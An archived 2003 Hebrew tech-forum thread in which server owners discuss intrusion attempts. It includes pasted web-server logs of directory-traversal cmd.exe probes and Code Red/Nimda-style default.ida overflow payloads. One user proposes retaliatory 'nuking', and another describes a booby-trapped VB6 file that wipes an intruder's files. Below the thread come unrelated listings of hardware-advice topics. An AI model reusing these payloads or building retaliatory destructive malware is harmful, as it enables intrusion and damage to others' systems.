הגנה...אבל מה עם התקפה?

פורסם 2003 באפריל 222 שנים

טוב אחרי שישמתי את כל אמצעי ההגנה הקיימים (FW+Scripts+NAT+AntiVirus) עדיין יש איזה נודניק מקליפורניה שבעזרת

IP Spoofing ממשיך לתקוף לי את השרת....

ISA Server detected a spoof attack from Internet Protocol (IP) address 10.31.103.126. A spoof attack occurs when an IP address that is not reachable via the interface on which the packet was received. If logging for dropped packets is set, you can view details in the packet filter log.

כפי הנראה הבחור מצא לעצמו שעשוע וכל אחה"צ (שעון ישראל),כבר במשך 4 ימים, הוא מנסה לתקוף לי את השרת (או אני לא יודע מה...)

מה אפשר לעשות?

ציטוט

פורסם 2003 באפריל 222 שנים

אצלי כל יום מנסים לפרוץ לשרת ה- Apache שלי אבל כמובן לא מצליחים.

שים לב ללוג שאני מקבל כל יום בערך...

<860>|81.220.50.241 [02/Apr/2003:22:15:23 -0800]."GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297

<861>|81.220.50.241 [02/Apr/2003:22:15:25 -0800]."GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297

<862>|81.220.50.241 [02/Apr/2003:22:15:26 -0800]."GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288

<863>|81.220.50.241 [02/Apr/2003:22:15:27 -0800]."GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288

<864>|81.220.50.241 [02/Apr/2003:22:15:28 -0800]."GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298

<865>|81.220.50.241 [02/Apr/2003:22:15:29 -0800]."GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298

<866>|81.218.31.154 [02/Apr/2003:22:19:55 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285

<867>|81.218.31.154 [02/Apr/2003:22:22:09 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285

<868>|81.218.69.126 [02/Apr/2003:22:41:19 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285

<869>|81.218.108.245 [02/Apr/2003:23:00:34 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285

--------------------------------------------------------------------------------

<870>|81.218.27.61 [02/Apr/2003:23:04:01 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285

--------------------------------------------------------------------------------

לדעתי כל עוד אתה מוגן , וזה לא משפיע על העבודה שלך, אין מה לדאוג.

ציטוט

פורסם 2003 באפריל 222 שנים

מחבר

נו...ו? לא בא לך לדפוק באלה שמנסים? אולי איזה nuke קטן? אולי איזה abuse mail לספק אינטרנט?

ציטוט

פורסם 2003 באפריל 322 שנים

תתלונן לספק האינטרנט שלו. בארה"ב, בדר"כ, לוקחים את העניין הזה ברצינות.

ציטוט

פורסם 2003 באפריל 522 שנים

אצלי כל יום מנסים לפרוץ לשרת ה- Apache שלי אבל כמובן לא מצליחים.
שים לב ללוג שאני מקבל כל יום בערך...
<860>|81.220.50.241 [02/Apr/2003:22:15:23 -0800]."GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297
<861>|81.220.50.241 [02/Apr/2003:22:15:25 -0800]."GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 297
<862>|81.220.50.241 [02/Apr/2003:22:15:26 -0800]."GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288
<863>|81.220.50.241 [02/Apr/2003:22:15:27 -0800]."GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 400 - 288
<864>|81.220.50.241 [02/Apr/2003:22:15:28 -0800]."GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298
<865>|81.220.50.241 [02/Apr/2003:22:15:29 -0800]."GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - HTTP/1.0" - 404 - 298
<866>|81.218.31.154 [02/Apr/2003:22:19:55 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285
<867>|81.218.31.154 [02/Apr/2003:22:22:09 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285
<868>|81.218.69.126 [02/Apr/2003:22:41:19 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285
<869>|81.218.108.245 [02/Apr/2003:23:00:34 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285
--------------------------------------------------------------------------------
<870>|81.218.27.61 [02/Apr/2003:23:04:01 -0800]."GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - HTTP/1.0" - 404 - 285
--------------------------------------------------------------------------------
לדעתי כל עוד אתה מוגן , וזה לא משפיע על העבודה שלך, אין מה לדאוג.

אף אחד לא מתקיף אותך, זה וירוס נימדה הידוע, הוא עושה סריקות ומנסה להדביק עוד כתובות, דווח את זה לספק האינטרנט של האיי פי הזה והם יתפלו בזה.

[/תתלונן לספק האינטרנט שלו. בארה"ב, בדר"כ, לוקחים את העניין הזה ברצינות.

זהו, שגם בישראל לוקחים את זה ברצינות וכמה תיפלו לי בהמון מקרים דומים כאלו.

ציטוט

פורסם 2003 באפריל 522 שנים

אני מריץ IIS 6, וEXCHANGE SERVER... לא יכול להיות יותר פגיע מזה.......

אבל:

פרצו לי פעם אחת לפני חודשיים ועשו בלאגן, סגרתי את החור, וכל יום יש לי בערך 30 ניסיונות פריצה רציניים, ועוד

הרבה מאוד סקנרים מעצבנים, אבל הכל מאובטח כמו שצריך.

לגבי ההתקפה, הכי טוב זה כמו שאמרת, מייל לספק + הLOG והם יטפלו בו, חוצמזה אתה יכול לנוסת מה שאני ניסיתי פעם:

תעשה לו מה שנקרא מלכודת, הוא "כאילו" נכנס לC, ושם שמתי תיקייה שקוראים לה TOP-SECRET, ושם יהיה קובץ

עם שם מפתה כמו: "WINDOWS XP KERNEL SOURCE" או כל דבר אחר, הוא יוריד ויפתח... ובום, הקובץ הוא תוכנה

קטנה שנבנתה בVB6 והיא מבלבלת את הרגיסטרי ומוחקת קבצים חשובים... שיש רק פתרון אחד: פירמוט...

טיפה מתוסבך, אבל זה עובד...

ציטוט

פורסם 2003 באפריל 522 שנים

תעשה לו מה שנקרא מלכודת, הוא "כאילו" נכנס לC, ושם שמתי תיקייה שקוראים לה TOP-SECRET, ושם יהיה קובץ

עם שם מפתה כמו: "WINDOWS XP KERNEL SOURCE" או כל דבר אחר, הוא יוריד ויפתח... ובום, הקובץ הוא תוכנה

קטנה שנבנתה בVB6 והיא מבלבלת את הרגיסטרי ומוחקת קבצים חשובים... שיש רק פתרון אחד: פירמוט...

טיפה מתוסבך, אבל זה עובד...

רעיון יפה, שימושי מאוד :jump:

ציטוט

פורסם 2003 באפריל 522 שנים

חחחחח

TOP-SECRET

כאילו שמישהו באמת יקנה את זה :bash:

ציטוט

ארכיון

דיון זה הועבר לארכיון ולא ניתן להוסיף בו תגובות חדשות.

עבור לרשימת הדיונים

מחפש M.2 NVMe SSD Adapter Case USB C היכול להכיל שני מודולים
אמצעי אחסון

מחפש M.2 NVMe SSD Adapter Case USB C היכול להכיל שני מודולים

ha · אתמול בשעה 05:25 AM1 יום

יש לי 3 מודולים של M.2 NVMe SSD של חצי טרה ללא שימוש, חשבתי להשתמש בהם לגיבוי/העברת נתונים. ראיתי בעלי מתאמים (https://www.aliexpress.com/item/1005005926007358.html?spm=a2g0o.productlist.main.7.7ed01790RJZVR8&algo_pvid=d92e2d76-519a-4455-86f3-356d7c416dc4&pdp_ext_f=%7B%22order%22%3A%221492%22%2C%22eval%22%3A%221%22%7D&utparam-url=scene%3Asearch%7Cquery_from%3A) והייתי שמח לדעת אם יש מתאם כזה שיתאים לשניים (או יותר...) מודולים.
- 0 תגובות
- 350 צפיות
ha

אתמול בשעה 05:25 AM1 יום

ha

אתמול בשעה 05:25 AM1 יום
מחשב לילד בן 7, 6000 שקל
ייעוץ לפני רכישת מחשב

מחשב לילד בן 7, 6000 שקל

ModChiP · ביום רביעי בשעה 09:13 PM1 יום

היי, אני עוזר לשכן לרכוש מחשב למשחקים, הוא הלך למחסני חשמל והציעו לו כמה אופציות, המלצתי לו להתייעץ בפורום הזה. זה מה שהציעו לו https://www.payngo.co.il/322154.html?from_autocomplete=HP+ONEM+40L+GT21-189935 ומסך https://www.payngo.co.il/312162.html הצעתי לו לרכוש מחשב בהתאמה אישית ולא מחשב מותג העדפה שהמחשב יחזיק כמה שיותר שנים ושיהיה בר שדרוג בקלות. 1. מה התקציב המירבי? האם מתאפשרת חריגה במידת הצורך? 6000 2. מה שימושי המחשב (משחקים, עריכה גרפית, עבודה משרדית, תכני HD למשל), יש דוגמה ספציפ
- 1 תגובה
- 619 צפיות
ModChiP

ביום רביעי בשעה 09:13 PM1 יום

yoavke

אתמול בשעה 04:51 AM1 יום
GeForce RTX 5050 הוכרז: קשה לכרטיסי מסך להיות זולים, לא משנה כמה הם משונמכים
כרטיסי מסך

GeForce RTX 5050 הוכרז: קשה לכרטיסי מסך להיות זולים, לא משנה כמה הם משונמכים

djelectric · ביום רביעי בשעה 02:40 PM1 יום

בשקט יחסי וללא התראות מוקדמות הכריזה NVIDIA על כרטיס המסך החדש והזול ביותר עד כה בסדרה - האם שווה יהיה לחסוך 50 דולר בשביל לוותר על כל כך הרבה לעומת RTX 5060?לכתבה
- 0 תגובות
- 69 צפיות
djelectric

ביום רביעי בשעה 02:40 PM1 יום

djelectric

ביום רביעי בשעה 02:40 PM1 יום
עזרה ברכישת מחשב נייד לאשה מבוגרת לשימוש ועבודה משרדית 4K
ייעוץ לפני רכישת מחשב

עזרה ברכישת מחשב נייד לאשה מבוגרת לשימוש ועבודה משרדית 4K

topy11 · ביום שני בשעה 05:48 PM3 ימים

1. מה התקציב המירבי? האם מתאפשרת חריגה במידת הצורך? 4000 ולא לחרוג ועדיף בפחות אם אפשרי 2. מה שימושי המחשב (משחקים, עריכה גרפית, עבודה משרדית, תכני HD למשל), יש דוגמה ספציפית למשחק או תוכנה? שימושי ביתי - אינטרנט אופיס אחסון תמונות וכו. בנוסף היא אחות בבית חולים ויהיה לה צורך לעבוד בבית עם המערכת של בית החולים עם כל מיני נתונים וטבלאות. אין לי מושג איזה דרישות יש לזה. 3. האם יש צורך בציוד הקפי בנוסף למחשב (לדוגמא: מקלדת, עכבר, רמקולים ומסך)?לא 4. האם יש רכיב בסיסי שאין צורך לכלול במפרט? (
- 6 תגובות
- 471 צפיות
topy11

ביום שני בשעה 05:48 PM3 ימים

A-10

ביום רביעי בשעה 09:26 PM1 יום
מבקש ביקורת על מפרט בתהליכים
ייעוץ לפני רכישת מחשב

מבקש ביקורת על מפרט בתהליכים

justkanji · יוני 20יוני 20

ככה, מבקש כל עצה או ביקורת שיש לכם לתת על המפרט הבא: רכשתי כבר 7800x3d יד שנייה ב1200 (אין לי בעיה למכור אותו אפילו ברווח, אבל כרגע נשאר עם המעבד הזה ) בתהליכים של רכישה של 4070 משומש ב2000 ש"ח קונה כל שאר החלקים חדש: זיכרונות Kingston FURY BEAST RGB 2x16GB DDR5 6000MHz CL30 (רציתי ללא RGB, קצת יותר זול אבל נגמר המלאי לKSP :/) https://ksp.co.il/web/item/338316 ספק Corsair RM750x 750W ATX 3.1 Gold Modular https://tms.co.il/corsair-psu-750w-r...-fully-modular לוח אם MSI B850 GAMING PLUS WIFI http
- 1 תגובה
- 1,430 צפיות
justkanji

יוני 20יוני 20

yoavke

ביום שבת בשעה 08:03 AM5 ימים